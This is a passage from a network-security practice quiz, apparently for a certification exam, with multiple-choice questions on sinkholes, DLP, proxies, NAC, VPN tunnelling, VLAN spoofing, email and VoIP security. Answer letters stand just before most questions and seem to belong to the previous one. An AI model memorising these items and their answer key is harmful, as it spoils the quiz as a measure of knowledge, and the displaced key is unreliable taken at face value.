proactive actions against a new family of malware that's been spreading around. It has spyware and botnet functions, and infected computers connect to external servers. You have a list of the domain names the malware contacts. What security tool would help you to recognize that malware on your network? A. Honeypot B. IDS C. Sinkhole D. WAF A Management is concerned by the potential of sensitive data leaking from employee workstations to outside networks, and you've been tasked with choosing network security controls to detect and prevent it. The employee LAN is already separated from the internet by a firewall and proxy server, so what is the next control you should add? Choose the best response. A. DLP on the network gateway B. Inline IPS C. Network-based DAM D. Proxy-based DAM C Your company is about to deploy a server application, and is using load balancing to cope with expected high volumes. To help protect the server from outside attack, you've been instructed to add additional security features to the load balancing solution, such as a WAF and proxy server. What kind of proxy configuration should you be researching? Choose the best solution. A. Anonymous proxy B. Forward proxy C. Reverse proxy D. Transparent proxy C,E You've recently installed an advanced UTM firewall at the network perimeter, with additional firewalls and IDS between security zones, but apart from host-based firewalls and antivirus there isn't much protection within a zone. What actions might help improve detection of an inside threat? Choose all that apply. A. Deploying a honeynet B. Installing a content switch with health checking C. Installing agent-based DAM on a DBMS D. Placing a transparent proxy at the network boundary E. Placing HIDS on individual hosts C You're evaluating NAC solutions. One feature you need is to make sure that when sales users join the network remotely they'll automatically be joined to the Sales network and given access to its resources. What kind of solution should you look for? Choose the best response. A. Agentless B. Location-based C. Role-based D. Rule-based B You're helping to evaluate a NAC system for remote access to a high security network. Client systems should have their security postures monitored at all times, even when not connected to the network. When they are connected, each request to the network will be evaluated to make sure it conforms with network policies. What kind of solution would meet these needs? A. Inline and agentless NAC B. Inline NAC with a persistent agent C. Out-of-band NAC with a dissolvable agent D. Out-of-band NAC with a persistent agent A You have a lingering problem with mobile users who connect to untrusted Wi-Fi networks without enabling their VPN, out of forgetfulness or lack of technical knowledge. What technology might help solve the problem? Choose the best response. A. Always-on VPN B. ESP C. Full tunneling D. Secure shell A Your organization has a BYOD policy for laptops and mobile devices used for remote access. Management wants a standardized VPN technology that has strong security and broad application compatibility. Since they don't want to support additional third-party applications on user devices, it also needs to be natively supported by all popular operating systems. What type of VPN can you recommend? A. L2TP/IPsec B. PPTP C. SSH D. SSL/TLS A,C,E You're replacing an old VPN solution with a new one and examining what policies and configuration options you should use. You're asked how the choice between split tunnel and full tunnel operation will affect network function and security. What answers should you give? Choose all that apply. A. Full tunnel might have a latency and throughput impact for client computers B. Full tunnel VPNs typically use weaker authentication methods C. Some regulatory requirements forbid split tunnel D. Split tunnel might increase the load on the enterprise VPN concentrator E. Split tunnel can increase the risk of data exfiltration A You can use a VPN to securely encrypt all of your network communication even on an open Wi-Fi network. True or false? A. True B. False C The management interface for your firewall has some known vulnerabilities, so you're worried that someone already on the network could log onto the firewall and change its settings. Which of the following methods could reduce that threat? Choose the best response. A. Deploy a sinkhole B. Switch to in-band management C. Switch to out-of-band management D. Switch to stateful filtering C,E A large office building has added Wi-Fi hotspots in individual areas over time with no centralized plan, but the network administrator wants you to determine a standard security profile for all of them with minimal hardware expenditure. You'd like it to have strong security and integrate into existing network AAA systems, but roaming and guest access aren't big priorities. At present the local administrators are capable of managing WAP configuration, provided they're all on the same page for recommended settings. What settings will you suggest for all WAPs? Choose all that apply . A. Deploy thin WAPs managed by a WLC B. Disable MAC filtering and SSID broadcast C. Enable MAC filtering to known mobile devices D. Enable WPS E. Use 802.1X mode with a RADIUS server A Your secure ICS network is isolated enough to prevent any direct logins from the main corporate network, but you want to manage a device on the ICS network from your own workstation. What technology can you configure to do so? Choose the best response. A. Jump box B. Mandatory access control C. Network access control D. VLAN segmentation B In a recent security incident, someone performed a switch spoofing attack to violate VLAN separation. The attacker connected to an access port on the switch and convinced it to set itself as a trunk port. What step could you take to prevent recurrence? Choose the best answer. A. Configure trunk ports to explicitly tag all traffic. B. Disable DTP and manually set all port status C. Set a different default ID for trunk ports D. Set all switch ports to Dynamic Auto using DTP A,B,C You're evaluating desktop sharing solutions for remote technical support. Since employees and technical support will be separated by untrusted networks, man-in-the-middle attacks are a significant security concern. Since the users being supported will be handling PII and PHI there are regulatory compliance issues if technical support workers view or access sensitive information on employee screens. What features does the remote assistance solution need? Choose all that apply. A. Ability for users to choose what application windows they do and do not share B. Auditing of remote access activity C. Open encryption protocols D. Presence functionality for technical support workers E. Proprietary encryption protocol C Two companies plan to regularly exchange highly sensitive information using email over the internet. Each has its own email servers, but they're connected indirectly through ISP networks and are likely to be forwarded through untrusted public servers along the way. What security feature would do the MOST to protect this valuable data? Choose the best response. A. Configure clients to use IMAP with TLS encyption B. Configure SPF features on each organization's email server C. Encrypt email contents with S/MIME D. Require authentication on SMTP servers A,D An executive at your company wants to host a web conference involving a great deal of proprietary information, so securing access to it is important. Which of the following risks can you NOT readily reduce with technical controls? Choose all that apply. A. An attendee records the conference by pointing a smartphone at the screen. B. An attendee shares his access code with multiple friends on their own computers. C. An attendee from the last conference who isn't invited this time reuses her old access code. D. An attendee takes notes and shares them with a competitor. E. An uninvited guest intercepts an invitation and simply claims to be the actual attendee. B While your existing VoIP system has some security features, you need a means to establish secure end-to-end communications with secure telephone systems at a US government facility. The solution must be compliant with applicable federal regulations. What is the best solution for your needs? A. Apply TLS encryption to a SIP connection B. Deploy a SCIP-compliant system C. Enable 802.1q D. Enable the SRTP security profile